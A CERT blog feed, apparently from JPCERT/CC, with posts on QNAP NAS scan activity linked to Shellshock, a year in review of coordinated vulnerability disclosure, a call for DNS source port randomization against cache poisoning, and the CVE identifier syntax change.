15 posts categorized "#Vulnerabilities" Feed

Dec 25, 2014

Increase in Possible Scan Activity from NAS Devices

Happy holidays to all, this is Tetsuya from Watch and Warning Group. Today, I would like to share a recent, remarkable trend discovered through TSUBAME sensors.


In TSUBAME, we have observed a significant increase in packets destined to 8080/TCP since December 5th, 2014. When accessing source IP addresses using a web browser, the admin login screen for NAS devices provided by QNAP was seen in many cases for IP addresses from certain regions.


[Figure 1: Scan count per hour observed at 8080/TCP from December 2nd, 2014 onwards (Source: TSUBAME)]


Below are some characteristics that we noticed from TSUBAME data:

  - Increase in packets to Port 8080/TCP since December 5th, 2014

  - The TTL value for most of the packets were between 30 - 59

  - A scan attempt sends 1 - 2 packets (the second packet is a re-send)

  - A source IP does not continuously scan a particular destination IP (The majority scans only once)



Also we were able to verify the following after checking some of the source IP addresses:

  - When accessing Port 80/TCP of the source address, a redirect to Port 8080/TCP occurs and the admin login screen of QNAP NAS is shown

  - The QNAP firmware looks to be version 4.1.0 or earlier (Information taken from the screen that is shown. 4.1.0 and earlier are affected by Shellshock) (*1)


Using an environment separate from TSUBAME to check the packets sent by an infected QNAP device, we saw the following request (there are several types of requests).


[Figure 2: Sample request from infected device (Source: JPCERT/CC)]


When a QNAP NAS device using a vulnerable version of firmware receives this request, the Shellshock vulnerability is leveraged to download a malicious attack program over the Internet and be infected by malware (*2, *3). Once infected, it begins to search for other vulnerable NAS devices. As a result of this activity, a large number of NAS devices were infected and we believe this is the reason for the sudden increase in packets to 8080/TCP.


The vendor has released firmware to address the Shellshock vulnerability. If you have yet to apply the update, we recommend that you first check (*2) whether you have been infected or not.


  JVN#55667175 QNAP QTS vulnerable to OS command injection (*1)



  The Shellshock Aftershock for NAS Administrators (*2)



  Worm Backdoors and Secures QNAP Network Storage Devices (*3)



 An Urgent Fix on the Reported Infection of a Variant of GNU Bash Environment Variable Command Injection Vulnerability (*4)



Thank you for reading, and we wish you all the best for the coming year.


- Tetsuya Mizuno

Dec 11, 2014

Year in Review - Vulnerability Handling and Changing with the Times

Hello and Happy Holiday Season to everybody.

Taki again, and today I will write about some experiences in product (software, hardware) vulnerability coordination this year.


 - Introduction -

A lot happened this year and I do not have the time to go through everything, but would like to go over some of the major issues that we handled and for those that are not familiar, provide a very brief overview of our coordination activities.

Before I move on, our vulnerability advisories are published at Japan Vulnerability Notes (JVN). Other CSIRTs across the globe have their own sites like this, such as CERT/CC and NCSC-FI. While CERT/CC publishes quite a few advisories each year, NCSC-FI only publishes several high-profile issues each year that affect a large number of users.

The number of published advisories on JVN is shown below.



[Figure 1 - Number of product vulnerability-related advisories published on JVN per quarter since the 2nd quarter of 2011 (Source: JPCERT/CC)]


What can be seen on JVN are advisories for vulnerabilities in products, which directs users to fixes, updates, patches, etc. for products in use. However, what is seen here is merely a small portion of the work that is involved in our vulnerability handling activities.

We coordinate the disclosure of product vulnerabilities with developers, researchers so that they do not become 0-days, where information about a vulnerability is disclosed without a way for the user to resolve it. Some of you may have heard the phrase "Coordinated Disclosure," which is what we attempt to do.


 - This Year -

This past year, we were involved in a few high profile cases which even received media attention.

 One of these issues was the so-called "Heartbleed" vulnerability in OpenSSL. There are quite a few articles on the web that describe the disclosure timeline, so I will not get into those details here. As an aside, here is a previous entry that describes how Japanese organizations dealt with Heartbleed.

We received information on this issue a few days prior to disclosure from one of our global counterparts. As we were about to begin the coordination process with developers the issue was disclosed by the OpenSSL team.

This case taught us (again!) that while reports may be sent to us in a confidential manner, this does not mean that we are the only ones that have this information.


[Figure 2 - Sample image of vulnerability handling information flow during a coordination effort (What a mess!) (Source: JPCERT/CC)]

This is especially true in cases that involve open-sourced software. There were quite a few high-profile advisories involving OpenSSL this year (CCS Injection, POODLE attack, etc.) which eventually led to the OpenSSL team releasing a new security policy  related to addressing vulnerabilities.

 Pre-disclosure, or notification prior to public disclosure for such open source products have been done through mailing lists or sending separate e-mails to relevant parties. Now most major open source projects only pre-disclose with certain groups of developers that need fixes first and then the rest of the world gets to know about the issue at the same time. This is also true with software provided by the Internet Systems Consortium (ISC), such as BIND.

- The next step in vulnerability handling -

The experiences that I had over this past year have shown me that not only are more and more people looking for vulnerabilities, but this information is moving around at such high speeds to a variety of parties, where in some cases, have no idea that another particular group has that information.

In general, the fewer parties involved in a coordination effort, the better. Not only does this reduce the probability that the information gets disclosed prematurely, but it also provides the developer better control as to how this non-public vulnerability information is being handled.

As a coordination center, we serve as the intermediary between the reporter and developer. If a reporter can report and communicate with the developer directly, then I believe they should do so. Our involvement in such a case is not necessary and in fact is a loss of time since each communication has to go through an additional party.

However for cases involving open sourced software that is implemented in various products, further coordination becomes necessary and this is where we can (and have been able to) provide value in a coordination effort.

Vulnerability handling has been evolving from a series of one-to-one communications to where various parties (that are often not in contact with each other) are involved in a single case at the same time. Hopefully we can continue to evolve with the times so that we can provide maximum value to a vulnerability coordination effort so that the proper information is being sent to relevant parties.

I wish everybody a safe and wonderful holiday season!

Takayuki (Taki) Uchiyama

Apr 18, 2014

Source Port Randomization for Caching DNS Servers Requested, yet again.

Hello, this is Moto Kawasaki, a new member of Global Coordination Division.


Alerts from JPRS and JPCERT/CC

On April 14th 2014, JPRS (Japan Registry Services Co., Ltd.) and JPCERT/CC concurrently published the alerts on DNS cache poisoning attack.


     Alert from JPRS

     http://jprs.jp/tech/security/2014-04-15-portrandomization.html (Japanese version)


     Alert from JPCERT/CC

     https://www.jpcert.or.jp/english/at/2014/at140016.html (English version)

     https://www.jpcert.or.jp/at/2014/at140016.html (Japanese version)


Now I'd like to elaborate on the key points and share my views on the case by reading between the lines of these alerts.


The effect of Source port randomization against cache poisoning

According to the alert issued by JPRS, they made a request for DNS server administrators to randomize the UDP source port number from which caching DNS servers send out query packets as a mitigation against cache poisoning attacks.


Cache poisoning attack is a long-lasting threat on caching DNS servers, injecting arbitrary entry and diverting users to malicious web sites, mail servers, and so forth.

Dan Kaminsky disclosed, in 2008, his method to attack disabled TTL (Time-To-Live) protection by using "not cached data" as query name. This news astonished people because it enabled continuous attack, in fact, from “once in several hours” to “almost anytime”.


On the other hand, source port randomization is considered as the first-choice and mandatory mitigation. Because it increases difficulty for attackers to predict to which port in the range of randomized source port they should send malicious packets, source port randomization reduces the probability of successful attack by one over a few ten-thousands. This is the reason why JPRS recommends source port randomization.


But why did we re-emphasize the risk of cache poisoning attack and importance of source port randomization? JPRS described in their alert by referring to the two recent findings.

One is that JPRS had been informed by large ISPs in Japan that they are observing the increase of cache poisoning attacks with Kaminsky's method.

The other is that JPRS found that approximately 10% of source IP addresses, among the senders of DNS query to JP DNS Servers, did NOT randomize their source port yet.

JPRS kindly supplied a graph (Figure 1) which describes the proportion of the source port randomization observed. We can find several cliffs, swells and overall decline tendency. One of the cliffs might be the aftereffects of Kaminsky’s presentation or from the release of DNS software with randomized source port by default. And at last, 10% of the IP addresses still send queries from static (fixed) or limited (predictable) source ports.


Figure 1 Transition of source port randomization status (Apr-2006 to Apr-2014) by JPRS. 

Trasition_of_source_port_randamizatSource: JPRS (http://jprs.jp/tech/security/2014-04-15-portrandomization-status-e.pdf))


These findings imply, I think, a large number of caching DNS servers are still vulnerable to cache poisoning. This can escalate into domain name hijacking, etc. for the users of such caching DNS servers.


Our gratitude and action in the near future

Based on the list of vulnerable caching DNS servers provided by JPRS, JPCERT/CC is going to notify administrators to fix their setting. And it is our great pleasure to cooperate with other parties, just like we did with JPRS for handling this case.


Finally, I hope this blog entry will help address the issue and make the world of randomized source port :-)


Thank you.

Moto Kawasaki

Jul 09, 2013

The votes are in - and we have a new CVE numbering scheme!

[Update 2013.8.1]
MITRE has prepared a page describing the change in CVE format.
The page is at the following:

   CVE-ID Syntax Change

Stated on the site, this change is scheduled to take effect on January 1, 2014. This page describes some of the background behind the change and towards the bottom of the page there is a list of some frequently asked questions.

Hello, this is Taki again and this is an update to a previous entry that I wrote on CVE identifiers.

For details on what CVE is, please refer to my previous entry or the CVE website.

As I wrote in my previous entry, CVE is undergoing a numbering scheme change and the editorial board voting has been completed.

After 2 rounds of voting, Option B was elected to be the new numbering scheme.
To review, Option B is as follows:

(Directly from the above link)
To reprise, Option B specifies the following:

- Variable length
- 4-digit Year + four fixed digits for IDs up to 9999
- IDs 0001 through 0999 padded with leading zeros
- IDs over 9999 will expand as needed, no leading zeros


- Four digit IDS (through 9999)
    - CVE-2014-0001, CVE-2014-0999
    - CVE-2014-1234, CVE-2014-9999

- Five digit IDS (> 9999)
    - CVE-2014-10000, CVE-2014-54321, CVE-2014-99999

- Six digit IDS (> 99999)
    - CVE-2014-100000, CVE-2014-123456, CVE-2014-999999

- Etc., as needed
According to MITRE, this new scheme will become effective January 1, 2014.

Transition plans and other specifics will become available as time goes on.
If there are any developments, I will notify via this blog.

For any questions, please contact me at vultures(at)jpcert.co.jp

- Taki Uchiyama

Continue reading »

Feb 13, 2013

CVE is about to undergo a change in syntax for CVE identifiers

Hello, it's Taki here and it has been a long time since I last wrote here.

Today's topic is about the following:

Call for Public Feedback on Upcoming CVE ID Syntax Change

Before I get into the details of what is said here, I would like to quickly introduce CVE. CVE stands for Common Vulnerabilities and Exposures and it is managed by The MITRE Corporation in the US. CVE identifiers are unique, common identifiers for publicly known information security vulnerabilities. For more details on CVE identifiers, please refer to the following:

About CVE Identifiers

So getting back to the discussion topic, CVE is about to undergo a change in the syntax for CVE identifiers. The current syntax, CVE-YYYY-NNNN can only support a maximum of 9,999 unique identifiers for a given year.

There are many users of CVE across the globe and a syntax change may affect a number of users, thus the CVE project is soliciting feedback prior to changing the syntax.

There are 3 choices to choose from, and I will list them in my order of preference with some reasoning behind its placement. (For details on the exact syntax for each option, please refer to the MITRE announcement)

1. Option A
This requires the least change, and I expect users that are already familiar with the current CVE syntax should be able to make the transition without too many issues. Being a little selfish, since this option requires the least change, it would make it easier to explain the differences to newer users of CVE and why they were made.

2. Option C
This is quite a drastic change from the current syntax but with the inclusion of the check digit, it would allow users to verify that the CVE identifier is a valid one. However, this syntax may be a little difficult to handle for product developers that incorporate CVE identifiers into their products.

3. Option B
I went back and forth a little between Options B and C. But the check digit that allows for validation (albeit a simple method) made the choice for me. In my opinion, it would be hard to determine whether that ID is a valid one since the number of digits would be arbitrary.

JPCERT/CC has been working with MITRE since 2008 to have CVEs issued for advisories on Japan Vulnerability Notes (JVN). Since then, JVN has become CVE compatible and JPCERT/CC has become a CVE Numbering Authority (CNA). As a member of the vulnerability handling team, I have listed my opinions here and would certainly welcome any feedback or discussion.

As mentioned on the MITRE announcement, there is a mailing list for discussions as well.

Any questions should be directed to the mailing list, but if you would like to have a discussion offline, please feel free to contact me at vultures(at)jpcert.or.jp.

- Taki Uchiyama